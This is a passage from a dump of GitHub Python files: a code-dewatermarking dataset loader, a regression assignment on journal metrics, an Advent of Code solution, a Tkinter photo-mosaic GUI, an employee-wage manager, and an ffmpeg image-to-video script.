show_progress=show_progress)\n valid_instances = self._load_jsonl_fast(data_dir,\n split='valid',\n show_progress=show_progress)\n test_instances = self._load_jsonl_fast(data_dir,\n split='test',\n show_progress=show_progress)\n\n return {\n 'train': train_instances,\n 'valid': valid_instances,\n 'test': test_instances\n }\n\n\nclass JsonlDewatermarkingDatasetProcessor(JsonlDatasetProcessor):\n def __init__(self, lang: str = 'cpp') -> None:\n super().__init__(lang)\n\n def load_jsonls(\n self,\n data_dir: str,\n show_progress: bool = True) -> Dict[str, List[DewatermarkingDataInstance]]:\n return super().load_jsonls(data_dir, show_progress)\n\n def _process_instance(self, id: int, obj: Dict, split: str):\n source = obj['after_watermark']\n target = obj['original_string']\n code_tokenizer = CodeTokenizer(lang=self.lang)\n _, source_tokens = code_tokenizer.get_tokens(source)\n _, target_tokens = code_tokenizer.get_tokens(target)\n return DewatermarkingDataInstance(id=f'{split}#{id}',\n source=source,\n source_tokens=source_tokens,\n target=target,\n target_tokens=target_tokens)\n\n def build_dataset(self, instances: List,\n vocab: CodeVocab) -> JsonlDewatermarkingDataset:\n return JsonlDewatermarkingDataset(instances, vocab)\n\n def build_vocab(self, instances: List[DewatermarkingDataInstance]) -> CodeVocab:\n vocab = CodeVocab()\n for instance in instances:\n for tok in instance.source_tokens:\n vocab.add_word(tok)\n for tok in instance.target_tokens:\n vocab.add_word(tok)\n\n return vocab\n","repo_name":"YBRua/SrcMarker","sub_path":"data_processing/dataset_processor.py","file_name":"dataset_processor.py","file_ext":"py","file_size_in_byte":12804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70744995367","text":"import csv\nfrom math import *\nimport numpy\nfrom itertools import combinations\n\ndef obtain_constants(Y,X):\n return 
numpy.dot(numpy.dot(numpy.linalg.pinv(numpy.dot(numpy.transpose(X),X)),numpy.transpose(X)),Y)\n\ncsv.register_dialect('myDialect',\ndelimiter = ';',\nskipinitialspace=True)\n\nwith open('scimagojr_journal.csv', 'r') as csvFile, open('TEMP1.csv', 'w') as csvFile2:\n    reader = csv.reader(csvFile, dialect='myDialect')\n    P=0\n    c=0\n    count=0\n    for roww in reader:\n        if P>0:\n            if int(roww[12])>0:\n                count+=1\n        P+=1\n    COUNT=floor(0.8*count)\n\nwith open('scimagojr_journal.csv', 'r') as csvFile, open('TEMP1.csv', 'w') as csvFile2:\n    reader = csv.reader(csvFile, dialect='myDialect')\n    LIST_orig=[]\n    for roww in reader:\n        if c==0:\n            data=[roww[2],roww[5],roww[7],roww[8],roww[9],roww[10],roww[11],roww[12],roww[13],roww[14],\"Impact Factor\"]\n            writer = csv.writer(csvFile2)\n            writer.writerow(data)\n\n        elif c>0 and c<COUNT and int(roww[12])>0 :\n            imp=int(roww[11])/int(roww[12])\n            roww[5]=roww[5].replace(\",\",\".\")\n            roww[12]=roww[12].replace(\",\",\".\")\n            roww[13]=roww[13].replace(\",\",\".\")\n            roww[14]=roww[14].replace(\",\",\".\")\n            \n            data=[roww[2],float(roww[5]),int(roww[7]),int(roww[8]),int(roww[9]),int(roww[10]),int(roww[11]),float(roww[12]),float(roww[13]),float(roww[14]),round(imp,5)]\n            writer = csv.writer(csvFile2)\n            writer.writerow(data)\n            \n        elif c>=COUNT and int(roww[12])>0:\n            imp=int(roww[11])/int(roww[12])\n            LIST_orig.append(round(imp,5))\n            \n            roww[5]=roww[5].replace(\",\",\".\")\n            roww[12]=roww[12].replace(\",\",\".\")\n            roww[13]=roww[13].replace(\",\",\".\")\n            roww[14]=roww[14].replace(\",\",\".\")\n\n            data=[roww[2],float(roww[5]),int(roww[7]),int(roww[8]),int(roww[9]),int(roww[10]),int(roww[11]),float(roww[12]),float(roww[13]),float(roww[14]),float(-10)]\n            writer = csv.writer(csvFile2)\n            writer.writerow(data)\n        c+=1\n\ncsvFile.close()\ncsvFile2.close()\n    \nwith open('TEMP1.csv', 'r') as csvFile3:\n    reader = csv.reader(csvFile3)\n    q=0\n    LIST_1=[]\n    LIST_2=[]\n    LIST_3=[]\n    LIST_4=[]\n    LIST_5=[]\n    LIST_6=[]\n    LIST_7=[]\n    LIST_8=[]\n    LIST_9=[]\n    LIST_imp_fac=[]\n    \n    LIST_1_testing=[]\n    LIST_2_testing=[]\n    LIST_3_testing=[]\n    LIST_4_testing=[]\n    LIST_5_testing=[]\n    LIST_6_testing=[]\n    LIST_7_testing=[]\n    LIST_8_testing=[]\n    LIST_9_testing=[]\n\n    for roww in reader:\n        if q>0 and q%2==0 and float(roww[10])!=-10.0:\n            LIST_1.append(float(roww[1])) \n            LIST_2.append(int(roww[2])) \n            LIST_3.append(int(roww[3])) \n            LIST_4.append(int(roww[4])) \n            LIST_5.append(int(roww[5]))\n            LIST_6.append(int(roww[6]))\n            LIST_7.append(float(roww[7]))\n            LIST_8.append(float(roww[8]))\n            LIST_9.append(float(roww[9]))\n            LIST_imp_fac.append(float(roww[10])) \n\n        elif q>0 and q%2==0 and float(roww[10])==-10.0:\n            LIST_1_testing.append(float(roww[1])) \n            LIST_2_testing.append(int(roww[2])) \n            LIST_3_testing.append(int(roww[3])) \n            LIST_4_testing.append(int(roww[4])) \n            LIST_5_testing.append(int(roww[5]))\n            LIST_6_testing.append(int(roww[6]))\n            LIST_7_testing.append(float(roww[7]))\n            LIST_8_testing.append(float(roww[8]))\n            LIST_9_testing.append(float(roww[9]))\n        q+=1 
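# obtain_constants above solves the least-squares problem via the normal equations,
# beta = pinv(X^T X) X^T Y. A quick standalone sanity check (toy data of my own, not
# the assignment's journal data) that it matches numpy's built-in lstsq solver:
X_toy = numpy.array([[1.0, 0.0], [1.0, 1.0], [1.0, 2.0]])  # intercept column + one feature
Y_toy = numpy.array([[1.0], [3.0], [5.0]])                 # exactly Y = 1 + 2*x
beta = obtain_constants(Y_toy, X_toy)
ref = numpy.linalg.lstsq(X_toy, Y_toy, rcond=None)[0]
assert numpy.allclose(beta, ref) and numpy.allclose(beta.ravel(), [1.0, 2.0])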
\ncsvFile3.close()\n\ntotality_list=[]\ntotality_list.append(LIST_1)\ntotality_list.append(LIST_2)\ntotality_list.append(LIST_3)\ntotality_list.append(LIST_4)\ntotality_list.append(LIST_5)\ntotality_list.append(LIST_6)\ntotality_list.append(LIST_7)\ntotality_list.append(LIST_8)\ntotality_list.append(LIST_9)\n\ntotality_list_testing=[]\ntotality_list_testing.append(LIST_1_testing)\ntotality_list_testing.append(LIST_2_testing)\ntotality_list_testing.append(LIST_3_testing)\ntotality_list_testing.append(LIST_4_testing)\ntotality_list_testing.append(LIST_5_testing)\ntotality_list_testing.append(LIST_6_testing)\ntotality_list_testing.append(LIST_7_testing)\ntotality_list_testing.append(LIST_8_testing)\ntotality_list_testing.append(LIST_9_testing)\n\nCOMBOS=sum([list(map(list,combinations(totality_list,i)))for i in range(len(totality_list)+1)],[])\nCOMBOS.remove([])\naddo=[1]*461\naddo_testing=[1]*117\n\nCOMBOS_testing=sum([list(map(list,combinations(totality_list_testing,i)))for i in range(len(totality_list_testing)+1)],[])\nCOMBOS_testing.remove([])\n\nfor i in range(len(COMBOS)):\n COMBOS[i].insert(0,addo)\n\nfor i in range(len(COMBOS_testing)):\n COMBOS_testing[i].insert(0,addo_testing)\n\nall_combinations=[]\nall_combinations_testing=[]\n\nfor i in range(len(COMBOS)):\n all_combinations.append(numpy.transpose(COMBOS[i]))\n\nfor i in range(len(COMBOS_testing)):\n all_combinations_testing.append(numpy.transpose(COMBOS_testing[i]))\n\ntemp=[]\ntemp.append(LIST_imp_fac)\nY_impact=numpy.transpose(temp)\n\nconstants_all=[]\nfor i in range(len(all_combinations)):\n constants_all.append(obtain_constants(Y_impact,all_combinations[i]))\n\npredicted_Y=[]\nfor i in range(len(all_combinations_testing)):\n predicted_Y.append(numpy.dot(all_combinations_testing[i],constants_all[i]))\n\na=[]\nfor i in range(len(predicted_Y)): \n a.append(numpy.transpose(predicted_Y[i]))\n\nb=[]\nfor i in range(len(predicted_Y)):\n b.append(a[i][0])\n\nERROR_list=[]\nMAE=[]\nfor i in range(len(b)):\n SUM=0\n abso=0\n for j in range(len(b[0])):\n SUM+=(b[i][j]-LIST_orig[j])**2\n abso+=abs(b[i][j]-LIST_orig[j])\n MEAN_E=SUM/len(LIST_orig)\n abso_E=abso/len(LIST_orig)\n MAE.append(abso_E)\n ERROR_list.append(MEAN_E)\n\nw=sorted(ERROR_list)\nw2=sorted(MAE)\n\n\ndictionary=[\"SJR\",\"H Index\",\"Total Docs(2017)\",\"Total Docs(3years)\",\"Total Refs\",\"Total Cites(3years)\",\"Citable Docs(3years)\",\"Cites/Doc(2years)\",\"Ref/Doc\"]\nwhich_combi = sum([list(map(list, combinations(dictionary, i))) for i in range(len(dictionary) + 1)], [])\nwhich_combi.remove([])\n\nwith open('ERRORS_all.csv','w') as File1:\n data=[\"Combination no\",\"Combination\",\"Mean Absolute Error\", \"Mean Squared error\",\"Root Mean Squared Error\"]\n writer = csv.writer(File1)\n writer.writerow(data)\n\n for i in range(len(w)):\n if \"Cites/Doc(2years)\" not in str(which_combi[i])[1:-1]: \n data=[i+1,str(which_combi[i])[1:-1], MAE[i], ERROR_list[i] ,ERROR_list[i]**.5 ]\n writer = csv.writer(File1)\n writer.writerow(data)\nFile1.close\n\n\nwith open('RMSE_min.csv', 'w') as File2:\n data=[\"Combination no\",\"Combination\",\"Mean Squared error\",\"Root Mean Squared Error\"]\n writer = csv.writer(File2)\n writer.writerow(data)\n\n for i in range(len(w)):\n if \"Cites/Doc(2years)\" not in str(which_combi[ERROR_list.index(w[i])])[1:-1]: \n data=[ERROR_list.index(w[i])+1,str(which_combi[ERROR_list.index(w[i])])[1:-1],w[i] ,w[i]**.5 ]\n writer = csv.writer(File2)\n writer.writerow(data)\nFile2.close\n\nwith open('MAE_min.csv','w') as File3:\n data=[\"Combination 
no\",\"Combination\",\"Mean Absolute Error\"]\n    writer = csv.writer(File3)\n    writer.writerow(data)\n\n    for i in range(len(w)):\n        if \"Cites/Doc(2years)\" not in str(which_combi[MAE.index(w2[i])])[1:-1]: \n            data=[MAE.index(w2[i])+1,str(which_combi[MAE.index(w2[i])])[1:-1],w2[i] ]\n            writer = csv.writer(File3)\n            writer.writerow(data)\n\nFile3.close()","repo_name":"dak-7309/P-S-Projects","sub_path":"Multivariate Regression- use other factors like sjr, total docs/assignment2_2018137.py","file_name":"assignment2_2018137.py","file_ext":"py","file_size_in_byte":7604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5724926633","text":"#! /usr/bin/python3\r\n# -*- coding: utf-8 -*-\r\n\r\ndef is_valid(numbers, number):\r\n    visited = set()\r\n    for n in numbers:\r\n        if number - n in visited:\r\n            return True\r\n        visited.add(n)\r\n    return False\r\n\r\ndef main():\r\n    with open('./input.txt', 'r') as f:\r\n        numbers = [int(x) for x in f.readlines()]\r\n    \r\n    i = 25\r\n    while is_valid(numbers[i-25 : i], numbers[i]):\r\n        i += 1\r\n    invalid = numbers[i]\r\n    print(\"Part 1: {}\".format(invalid))\r\n\r\n    tail, head, rolling_sum = 0, 0, numbers[0]\r\n    while rolling_sum != invalid:\r\n        if rolling_sum < invalid:\r\n            head += 1\r\n            rolling_sum += numbers[head]\r\n        else:\r\n            rolling_sum -= numbers[tail]\r\n            tail += 1\r\n    \r\n    ans = min(numbers[tail:head+1]) + max(numbers[tail:head+1])\r\n    print(\"Part 2: {}\".format(ans))\r\n\r\nif __name__ == '__main__':\r\n    main()","repo_name":"ErikGralen/AdventOfCode","sub_path":"2020/Day09/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"873274807","text":"import tkFileDialog\nfrom Tkinter import *\nfrom PIL import ImageTk, Image\nimport random\nimport os\nimport tkMessageBox\nfrom FotoMosaico import *\nfrom FiltroMosaico import *\n\nclass Filtros(Frame):\n\n    #Class constructor\n    def __init__(self, parent):\n\n        Frame.__init__(self,parent)\n        self.pack(fill=BOTH, expand=True)\n        self.creaMenu()\n        self.creaCanvas()\n\n    #Function to load the menu into the window\n    def creaMenu(self):\n\n        self.menuBar = Menu(self)\n        self.archivoMenu = Menu(self.menuBar, tearoff=0)\n        self.archivoMenu.add_command(label=\"Abrir\", command=self.escogerImagen)\n        self.menuBar.add_cascade(label=\"Imagen\", menu=self.archivoMenu)\n        self.filtroMenu = Menu(self.menuBar, tearoff=0)\n        self.filtroMenu.add_command(label=\"Genera archivo de imagenes\", command= self.generaArchivo)\n        self.filtroMenu.add_command(label=\"Genera imagen\", command= self.aplicaFotoMosaico)\n        self.menuBar.add_cascade(label=\"Foto Mosaico\", menu=self.filtroMenu)\n        root.config(menu=self.menuBar)\n\n\n    def creaCanvas(self):\n        self.originalVentana = Canvas(self, bg=\"pink\",width=500,height=400)\n        self.originalVentana.pack(side=LEFT, fill=BOTH, expand=True)\n\n        self.filtroVentana = Canvas(self,bg =\"orange\",width=500,height=400 )\n        self.filtroVentana.pack(side=RIGHT, fill=BOTH, expand=True)\n\n    #Function to place the images in the image areas\n    def escogerImagen(self):\n        size = 500,500\n        self.ruta = tkFileDialog.askopenfilename()\n        self.imagen = Image.open(self.ruta)\n        self.aplica = Image.open(self.ruta)\n        self.imagen.thumbnail(size,Image.ANTIALIAS)\n        self.aplica.thumbnail(size,Image.ANTIALIAS)\n        self.rgb = self.imagen.convert('RGB')\n        self.pixels = self.aplica.load()\n        imageFile = ImageTk.PhotoImage(self.imagen)\n        imageAplica = 
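# The Advent of Code Day 9 solution above finds the contiguous range summing to
# `invalid` with a two-pointer sliding window. The same technique isolated as a
# reusable helper (a sketch; find_range is my own name, the returned indices are
# inclusive, and a valid range is assumed to exist):
def find_range(numbers, target):
    tail, head, rolling_sum = 0, 0, numbers[0]
    while rolling_sum != target:
        if rolling_sum < target:
            head += 1
            rolling_sum += numbers[head]   # grow the window to the right
        else:
            rolling_sum -= numbers[tail]   # shrink it from the left
            tail += 1
    return tail, head

assert find_range([35, 20, 15, 25, 47, 40], 127) == (2, 5)  # 15 + 25 + 47 + 40 == 127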
ImageTk.PhotoImage(self.aplica)\n        self.originalVentana.image = imageFile\n        self.originalVentana.create_image(imageFile.width()/2, imageFile.height()/2, anchor=CENTER, image=imageFile, tags=\"bg_img\")\n        self.filtroVentana.image = imageAplica\n        self.filtroVentana.create_image(imageAplica.width()/2, imageAplica.height()/2, anchor=CENTER, image=imageAplica, tags=\"bg_img\")\n        self.originalVentana.create_text((250,380),text=\"Imagen original\")\n        self.filtroVentana.create_text((250,380),text=\"Imagen con filtro\")\n\n    \"\"\"\n    Function that tells the user the photo mosaic will take a while and asks for the folder of images to use\n    \"\"\"\n    def aplicaFotoMosaico(self):\n        if self.filtroVentana.find_all() != ():\n            self.top = Toplevel()\n\n            self.label = Label (self.top, text= \"Introduce el tamanio del mosaico\\nDa dos valores positivos para (x,y) \")\n            self.label.pack()\n\n            self.entraX = IntVar()\n            Entry(self.top, textvariable=self.entraX).pack()\n\n            self.entraY = IntVar()\n            Entry(self.top, textvariable=self.entraY).pack()\n\n            self.label3 = Label(self.top, text=\"Introduce el nombre del archivo que contiene la informacion de las imagenes a usar\")\n            self.label3.pack()\n\n            self.archivo = StringVar()\n            Entry(self.top, textvariable=self.archivo).pack()\n\n            self.label4 = Label (self.top, text=\"Selecciona la carpeta con las imagenes a usar\")\n            self.label4.pack()\n\n            self.buttontext = StringVar()\n            self.buttontext.set(\"Obten fotomosaico\")\n            self.button = Button(self.top, textvariable=self.buttontext, command= lambda: self.sacaFotoMosaico(self.entraX,self.entraY,self.archivo)).pack()\n\n            self.label2 = Label (self.top, text = \"Va a tardar en generar el foto mosaico\")\n            self.label2.pack()\n        else:\n            tkMessageBox.showwarning(\"Error\",\"Escoge una imagen antes de aplicar un filtro\")\n\n    def sacaFotoMosaico(self,valorX,valorY,nombre):\n        self.entraX = valorX.get()\n        self.entraY = valorY.get()\n        self.archivo = nombre.get()\n        carpeta = tkFileDialog.askdirectory()\n        self.nuevaImagen = filtroFotoMosaico(self.imagen,self.aplica,carpeta,self.entraX,self.entraY,self.archivo)\n        imageAplica = ImageTk.PhotoImage(self.nuevaImagen)\n        self.filtroVentana.image = imageAplica\n        self.filtroVentana.create_image(imageAplica.width()/2, imageAplica.height()/2, anchor=CENTER, image=imageAplica, tags=\"bg_img\")\n        self.top.destroy()\n\n\n    def generaArchivo(self):\n        if self.filtroVentana.find_all() != ():\n            self.top = Toplevel()\n            self.label2 = Label(self.top, text=\"Da un nombre al archivo .txt que se va a generar\")\n            self.label2.pack()\n            self.nombre = StringVar()\n            Entry(self.top, textvariable=self.nombre).pack()\n            self.label = Label (self.top, text= \"Selecciona la carpeta con las imagenes que se usaran para el fotomosaico\")\n            self.label.pack()\n            self.buttontext = StringVar()\n            self.buttontext.set(\"Selecciona carpeta\")\n            self.button = Button(self.top, textvariable=self.buttontext, command= lambda: self.generaArchivoImg(self.nombre)).pack()\n            self.label3 = Label(self.top, text=\"Se va a tardar en generar el archivo\")\n            self.label3.pack()\n        else:\n            tkMessageBox.showwarning(\"Error\",\"Escoge una imagen antes de aplicar un filtro\")\n\n\n    def generaArchivoImg(self,archivo):\n        self.nombre = archivo.get()\n        carpeta = tkFileDialog.askdirectory()\n        guardaImagenes(carpeta,self.nombre)\n        self.top.destroy()\n\n#Run the program\nroot = Tk()\nroot.title(\"Filter Kar\")\nroot.wm_state(\"normal\")\n\napp = 
Filtros(root)\n\nroot.mainloop()\n","repo_name":"kaarla/digital-process-images","sub_path":"Proyecto/Proyecto.py","file_name":"Proyecto.py","file_ext":"py","file_size_in_byte":5768,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28443743897","text":"import random\nimport logging\nimport json\n\n\nlogging.basicConfig(filename='EmployeeWage_logs.log',\n encoding='utf-8', level=logging.DEBUG)\n\n\nclass Employee:\n\n def __init__(self, employee_parameters_dict):\n self.total_wage = 0\n self.total_emp_hrs = 0\n self.total_emp_days = 0\n self.emp_name = employee_parameters_dict.get(\"employee_name\")\n self.emp_wage = employee_parameters_dict.get(\"employee_wage\")\n self.max_working_hrs = employee_parameters_dict.get(\n \"maximum_working_hrs\")\n self.max_working_days = employee_parameters_dict.get(\n \"maximum_working_days\")\n\n def calc_wage(self):\n \"\"\"\n Function calculates wage of month\n :return: Employee Wage for the month\n \"\"\"\n try:\n is_full_time = 1\n is_part_time = 2\n\n while self.total_emp_hrs < self.max_working_hrs and self.total_emp_days < self.max_working_days:\n\n emp_check = random.randrange(0, 3)\n if emp_check == is_full_time:\n emp_hrs = 8\n self.total_emp_days += 1\n elif emp_check == is_part_time:\n emp_hrs = 4\n self.total_emp_days += 1\n else:\n emp_hrs = 0\n\n self.total_emp_hrs += emp_hrs\n self.total_wage += emp_hrs * self.emp_wage\n\n except Exception as e:\n print(e)\n logging.exception(e)\n\n\nclass Company:\n\n def __init__(self, company_name):\n self.company_name = company_name\n self.employee_dict = {}\n\n def add_emp(self, employee_object):\n \"\"\"\n Function to add employee object to employee_dict dictionary\n :param employee_object:\n :return:\n \"\"\"\n try:\n self.employee_dict.update(\n {employee_object.emp_name: employee_object})\n except Exception as e:\n print(e)\n logging.exception(e)\n\n def get_emp(self, emp_name):\n \"\"\"\n Function to get employee object\n :param emp_name: string\n :return: Employee object\n \"\"\"\n return self.employee_dict.get(emp_name)\n\n def update_emp(self, employee_object, data_dict):\n \"\"\"\n Function to update employee information in employee_dict dictionary\n :return:\n \"\"\"\n try:\n employee_object.emp_wage = data_dict.get(\"update_wage\")\n employee_object.max_working_hrs = data_dict.get(\n \"update_working_hours\")\n employee_object.max_working_days = data_dict.get(\n \"update_working_days\")\n\n except Exception as e:\n print(e)\n logging.exception(e)\n\n def delete_emp(self, emp_name):\n \"\"\"\n Function deletes existing employee from the employee_dict dictionary\n :return:\n \"\"\"\n try:\n self.employee_dict.pop(emp_name, \"Employee not found\")\n except Exception as e:\n print(e)\n logging.exception(e)\n\n def display_employees(self):\n \"\"\"\n Function to display all employees\n :return: Employee information\n \"\"\"\n print(\n \" Employee Name \\tEmployee Wage \\tTotal Working hours \\tTotal working days\")\n for key, value in self.employee_dict.items():\n print(\"\\t{}\\t\\t{}\\t\\t{}\\t\\t{}\".format(value.emp_name, value.emp_wage,\n value.max_working_hrs, value.max_working_days))\n\n def display_employee_data(self, emp_name):\n \"\"\"\n Function displays monthly wage, hours and days\n :return:\n \"\"\"\n try:\n employee_object = self.get_emp(emp_name)\n if not employee_object:\n print(\"Employee not present\")\n else:\n print(\"s.no\\t\\tDetails\\t\\t\\t\\t\\t Data\")\n print(\"1.\\tTotal employee wage for the month \\t\\t 
{}\".format(\n employee_object.total_wage))\n print(\"2.\\tTotal days employee worked for the month \\t {}\".format(\n employee_object.total_emp_days))\n print(\"3.\\tTotal hours employee worked for the month \\t {}\".format(\n employee_object.total_emp_hrs))\n except Exception as e:\n print(e)\n logging.exception(e)\n\n\nclass MultipleCompanies:\n def __init__(self,):\n self.company_dict = {}\n self.write_to_json_file = write_to_json_file\n\n def add_company(self, company_object):\n \"\"\"\n Function add company to company_dict dictionary\n :param company_object:\n \"\"\"\n try:\n self.company_dict.update(\n {company_object.company_name: company_object})\n except Exception as e:\n print(e)\n logging.exception(e)\n\n def get_company_object(self, company_name):\n return self.company_dict.get(company_name)\n\n def display_company(self):\n \"\"\"\n Function to display company_dict dictionary\n \"\"\"\n # print(self.company_dict.keys())\n # display values\n for company_name, company_object in self.company_dict.items():\n print(company_name)\n\n def remove_company(self, company_name):\n \"\"\"\n Function to remove a company from company_dict dictionary\n :param company_name:\n \"\"\"\n self.company_dict.pop(company_name, \"Company not present\")\n\n def write_to_csv_file(self):\n \"\"\"\n Function to write details of employee\n \"\"\"\n try:\n with open(\"company_info.csv\", \"w\") as write_file:\n fieldnames = ['employee_name', 'employee_wage',\n 'maximum_working_hrs', 'max_working_days']\n\n csv_writer = csv.DictWriter(write_file, fieldnames=fieldnames)\n csv_writer.writeheader()\n\n for company_name, company_object in self.company_dict.items():\n company_dictionary = company_object.get_company_object()\n for key, value in company_dict.items():\n csv_writer.writerow(value)\n except Exception as e:\n print(e)\n logging.exception(e)\n\n\nclass JsonMixin:\n def write_to_json_file(self):\n \"\"\"\n Function to write Details to Json File\n \"\"\"\n json_dict = {}\n for company_name, company_object in self.company_dict.items():\n company_dictionary = company_object.get_company_object()\n\n json_dict.update({company_name: company_dictionary})\n with open(\"company_info.json\", \"w\")as write_file:\n json.dump(json_dict, write_file, indent=4)\n\n\ndef write_to_json_file():\n \"\"\"\n Function to write contact information to a json file\n \"\"\"\n multiple_companies.write_to_json_file()\n\n\ndef read_from_json_file():\n \"\"\"\n Function to read a contact from json file\n \"\"\"\n with open(\"company_info.json\", \"r\")as read_file:\n json_object = json.load(read_file)\n print(json_object)\n\n\ndef write_to_csv_file():\n \"\"\"\n Function to write contact information to a json file\n \"\"\"\n multiple_companies.write_to_json_file()\n\n\ndef read_from_csv_file():\n \"\"\"\n Function to read contacts from a CSV file\n \"\"\"\n with open(\"company_info.csv\", \"r\") as read_file:\n csv_reader = csv.DictReader(read_file)\n\n for line in csv_reader:\n print(line)\n\n\ndef add_employee():\n \"\"\"\n Function to add employee\n \"\"\"\n try:\n # Taking input from user\n company_name = input(\"Enter company name : \")\n company_object = multiple_companies.get_company_object(company_name)\n if not company_object:\n company_object = Company(company_name)\n multiple_companies.add_company(company_object)\n\n employee_name = input(\"Enter employee name : \")\n if employee_name == \"\":\n print(\"Please enter employee name\")\n return\n employee_wage = int(input(\"Enter employee wage per hour : \"))\n 
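# write_to_json_file/read_from_json_file above persist the whole company dictionary
# with json.dump/json.load. A minimal round-trip sketch of that pattern (toy data and
# a toy file name, not the program's real schema):
import json
snapshot = {"AcmeCorp": {"alice": {"employee_wage": 20, "maximum_working_hrs": 160}}}
with open("toy_company_info.json", "w") as write_file:
    json.dump(snapshot, write_file, indent=4)
with open("toy_company_info.json", "r") as read_file:
    assert json.load(read_file) == snapshot  # dict keys come back as strings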
maximum_working_hrs = int(input(\"Enter employee work hours : \"))\n maximum_working_days = int(input(\"Enter employee working days : \"))\n\n # using dictionary instead of passing multiple parameters\n emp_parameters = {\"employee_name\": employee_name, \"employee_wage\": employee_wage,\n \"maximum_working_hrs\": maximum_working_hrs, \"maximum_working_days\": maximum_working_days}\n employee = Employee(emp_parameters)\n\n # calculating employee wage\n employee.calc_wage()\n\n # adding employee object in dictionary\n company_object.add_emp(employee)\n write_to_json_file()\n write_to_csv_file()\n\n except Exception as e:\n print(e)\n logging.exception(e)\n\n\ndef update_employee():\n \"\"\"\n Function to update employee\n \"\"\"\n try:\n comp_name_to_update = input(\n \"Enter company to update employee information : \")\n company_obj = multiple_companies.get_company_object(\n comp_name_to_update)\n employee_name = input(\"Enter employee name to update : \")\n emp_object = company_obj.get_emp(employee_name)\n if not emp_object:\n print(\"Employee not present\")\n else:\n update_wage = int(input(\"Enter new wage to update : \"))\n\n update_working_hours = int(\n input(\"Enter new working hours to update : \"))\n\n update_working_days = int(\n input(\"Enter new working days to update : \"))\n\n company_obj.update_emp(emp_object, {\"update_wage\": update_wage,\n \"update_working_hours\": update_working_hours,\n \"update_working_days\": update_working_days})\n\n write_to_json_file()\n write_to_csv_file()\n\n except Exception as e:\n print(e)\n logging.exception(e)\n\n\ndef display_employee():\n \"\"\"\n Function to display specific employee information\n \"\"\"\n # Display all employees\n company_name = input(\"Enter company to view employees : \")\n company_object = multiple_companies.get_company_object(company_name)\n company_object.display_employees()\n\n\ndef display_employee_wage():\n \"\"\"\n Function to display employee wage information\n \"\"\"\n # display monthly wage information\n company_name = input(\"Enter company to view employee wage information : \")\n company_object = multiple_companies.get_company_object(company_name)\n employee_name = input(\n \"Enter name of the employee you want the wage information of : \")\n company_object.display_employee_data(employee_name)\n\n\ndef delete_employee():\n \"\"\"\n Function to delete specific employee from a specific company\n \"\"\"\n # delete\n company_name = input(\"Enter company to delete employees : \")\n company_object = multiple_companies.get_company_object(company_name)\n employee_name = input(\"Enter employee name : \")\n company_object.delete_emp(employee_name)\n write_to_json_file()\n write_to_csv_file()\n\n\ndef display_companies():\n \"\"\"\n Function to display all companies\n \"\"\"\n # Display company_dict dictionary\n multiple_companies.display_company()\n\n\ndef delete_company():\n \"\"\"\n Function to remove a company from dictionary\n \"\"\"\n # Delete a company\n company_name = input(\"Enter company name to delete : \")\n multiple_companies.remove_company(company_name)\n\n write_to_json_file()\n write_to_csv_file()\n\n\nif __name__ == \"__main__\":\n try:\n multiple_companies = MultipleCompanies()\n\n while True:\n choice = int(input(\"1. Add new employee\\t2. Show all employees\\t3. Show employee wage data\\t\"\n \"4. Update employee\\t5. Delete employee\\t6. Display all companies\\t\"\n \"7. Delete a company\\t8. Read from a JSON file\\t9. Write to JSON file\\t10. read from csv file\\t11. Write to csv file\\t0. 
Exit\\nEnter your choice : \"))\n\n choice_dict = {1: add_employee, 2: display_employee, 3: display_employee_wage, 4: update_employee,\n 5: delete_employee, 6: display_companies, 7: delete_company, 8: read_from_json_file, 9: write_to_json_file, 10: read_from_csv_file, 11: write_to_csv_file}\n\n if choice == 0:\n break\n elif choice > 11:\n print(\"Enter correct choice\")\n else:\n choice_dict.get(choice)()\n\n except Exception as e:\n print(e)\n logging.exception(e)\n","repo_name":"ItsrAvI-rAnJaN/employeewagecomputation","sub_path":"employeewage.py","file_name":"employeewage.py","file_ext":"py","file_size_in_byte":12632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40247089945","text":"import threading\nimport sys\nimport os\nimport subprocess\nimport customtkinter as tk\n# root = tk.Tk()\n\ndef convert():\n # s = f\"ffmpeg -sseof -00:00:30 -display_hflip -nostdin -i original.mp4 -crf 30 -s 720x360 {output_sv.get()}{file_e} 2>C:\\myffmpeg\\log.txt\"\n print(\"calling convert...\")\n try:\n results = subprocess.call([\n 'ffmpeg',\n '-framerate', '2',\n '-pattern_type', 'sequence',\n '-i', 'C:\\dat4sem\\Python\\weekTwo\\Plot_Pandas_API_DST\\img\\img%1d.png',\n '-s:v', '1920x1080',\n '-c:v', 'libx264',\n '-pix_fmt', 'yuv420p',\n 'C:\\dat4sem\\Python\\weekTwo\\Plot_Pandas_API_DST\\img\\out1.mp4'])\n # 'ffmpeg',\n # '-ss', '00:19:15', # denne slags tider må gerne sættes direkte i sekunder, fx 1,5 min = 90 (ingen : eller noget)\n # # '-display_hflip',\n # '-nostdin',\n # '-i', input_sv.get(),\n # '-crf', '15', # 9 er minimum?\n # '-s', '1080x720', # yt standard?\n # '-an', # no audio...\n # '-t', '00:00:45', # time after -ss to include...\n # '-vf','setpts=16*PTS', # slow mo... 8 = amount\n # 'test.mp4'])\n # f\"{output_sv.get()}{file_e}\"])\n\n if results:\n print(\"Failure\")\n # done.set(\"Working on it...\")\n else:\n print(\"Success!\")\n # done.set(\"Done!\")\n\n \n except:\n print(\"Failure\")\n\ndef start_submit_thread():\n print(\"starting submit thread...\")\n global submit_thread\n submit_thread = threading.Thread(target=convert)\n submit_thread.daemon = True\n # progressbar.start()\n submit_thread.start()\n tk.after(20, check_submit_thread)\n\ndef check_submit_thread():\n print(\"checking submit thread...\")\n if submit_thread.is_alive():\n tk.after(20, check_submit_thread)\n else:\n print(\"done\")\n # progressbar.stop()\n\n# start_submit_thread()","repo_name":"dgh81/Plot_Pandas_API_DST","sub_path":"animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41746746120","text":"from nose.tools import assert_equal\n\nfrom 